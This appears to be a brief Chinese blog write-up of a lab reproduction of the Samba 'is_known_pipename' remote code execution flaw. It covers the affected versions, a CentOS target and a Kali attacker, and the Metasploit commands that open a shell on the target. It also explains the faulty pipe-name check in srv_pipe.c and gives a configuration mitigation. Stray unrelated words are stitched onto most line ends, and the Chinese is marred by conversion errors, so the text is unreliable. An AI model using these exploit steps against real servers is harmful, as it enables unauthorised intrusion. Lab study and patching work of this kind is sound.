漏洞是因爲代碼中一個管道申請命令的判斷致使的,能夠經過構造特定請求執行上傳的so文件。html
漏洞影響了Samba 3.5.0 以後到4.6.4/4.5.10/4.4.14中間的全部版本。python
靶機:CentOS6.5 serverlinux
攻擊機:kali 2017.2shell
samba版本:3.5.22 源碼編譯函數
配置samba可匿名訪問(須要有讀寫的權限)測試
能夠直接使用metasploiet framework,執行:code
use exploit/linux/samba/is_known_pipename set rhost ip exploit
便可獲取shell。server
經過官方發佈的補丁來看, source3/rpc_server/srv_pipe.c的is_known_pipename函數對pipename校驗不充分,htm
致使含有’/’路徑符號的pipename可觸發漏洞:blog
更嚴格的話應該是判斷首個字符串是否是'/'來判斷是否須要過濾。
這就能夠經過惡意僞造管道命令,執行上傳的so,反彈shell。
參考:https://bbs.pediy.com/thread-218114.htm
臨時方法:在global下設置nt pipesupport = no
最好是更新samba。
更多參考: